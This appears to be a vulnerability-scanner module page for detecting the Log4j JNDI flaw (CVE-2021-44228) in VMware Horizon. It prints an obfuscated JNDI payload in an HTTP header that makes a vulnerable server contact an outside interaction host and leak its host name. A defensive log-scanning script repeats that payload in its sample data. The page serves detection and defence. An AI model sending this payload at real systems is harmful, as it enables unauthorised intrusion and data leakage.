VMware Horizon - JNDI Remote Code Execution (Apache Log4j)

By kannthu

Critical
Vidoc Module
#cve #cve2021 #rce #jndi #log4j
Description

What is the "VMware Horizon - JNDI Remote Code Execution (Apache Log4j)" module?

The "VMware Horizon - JNDI Remote Code Execution (Apache Log4j)" module is a test case designed to detect the vulnerability in VMware Horizon that allows remote code execution through the Apache Log4j framework. This vulnerability, identified as CVE-2021-44228, has a critical severity level and can be exploited by attackers to execute malware and obtain sensitive information.

This module was authored by johnk3r.

Impact

If successfully exploited, the vulnerability in VMware Horizon can have severe consequences. Attackers can execute arbitrary code on the affected system, leading to potential data breaches, unauthorized access, and system compromise. This can result in significant financial and reputational damage for organizations using VMware Horizon.

How does the module work?

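The module sends an HTTP request, built from a template, to the target system. The request exercises the vulnerability through the JNDI (Java Naming and Directory Interface) lookup feature in Apache Log4j. The payload sits in the Accept-Language header and triggers the vulnerable lookup, the same code path that permits remote code execution. In the request below, the nested ${lower:...} lookups spell out the dns scheme, so a vulnerable server reveals itself through a DNS interaction with the interaction URL.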

Here is an example of the HTTP request:

GET /portal/info.jsp HTTP/1.1
Host: <Hostname>
Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{%InteractionURL%}}

The module also includes matching conditions to determine if the vulnerability is present. It checks for the presence of the "dns" protocol in the interaction and matches the request against a regular expression pattern.

By running this module, organizations can identify if their VMware Horizon installation is vulnerable to the JNDI Remote Code Execution (Apache Log4j) exploit and take appropriate measures to mitigate the risk.
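For defenders, the nested-lookup obfuscation in that header can be undone when reviewing proxy or web logs. The following is an added example, not part of the Vidoc module or the original page: it resolves `${lower:...}` lookups from the inside out and reports the JNDI scheme it finds. It also handles `${upper:...}` and `${name:-default}` lookups, which goes beyond the request shown; the function names, the log layout and the `oast.example` domain are assumptions.

```python
import re

# Matches an innermost ${...} lookup, i.e. one with no nested "${" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")

def find_jndi(value, max_rounds=20):
    """Return the scheme of a JNDI lookup hidden in value ('dns', 'ldap', ...), or None."""
    hits = []

    def resolve(match):
        expr = match.group(1)
        head, _, rest = expr.partition(":")
        head = head.strip().lower()
        if head == "lower":            # ${lower:d} -> d, as in the request above
            return rest.lower()
        if head == "upper":
            return rest.upper()
        if head == "jndi":             # fully de-obfuscated lookup: record its scheme
            hits.append(rest.split(":", 1)[0].strip().lower())
        elif ":-" in expr:             # ${name:-default} falls back to its default text
            return expr.split(":-", 1)[1]
        return "<" + expr + ">"        # host-dependent lookup (e.g. env): keep, but inert

    # Resolve from the inside out until nothing changes; the cap bounds hostile input.
    for _ in range(max_rounds):
        resolved = _INNER.sub(resolve, value)
        if resolved == value:
            break
        value = resolved
    return hits[0] if hits else None

def scan(lines):
    """Return (line_number, scheme) for every log line carrying a JNDI lookup."""
    found = []
    for number, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            found.append((number, scheme))
    return found

# Constructed sample: client, path and Accept-Language as a proxy might log them.
SAMPLE_LOG = [
    '192.0.2.10 "/portal/info.jsp" "en-US,en;q=0.9"',
    '198.51.100.7 "/portal/info.jsp" "${jndi:${lower:d}n${lower:s}://${env:hostName}.oast.example}"',
    '192.0.2.11 "/" "de-DE,de;q=0.8"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A plain substring search for `jndi:dns` would miss the second sample line, because the scheme only appears after the inner lookups are resolved.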

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dns
and
regex: ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-...
Passive global matcher
No matching conditions.
On match action
Report vulnerability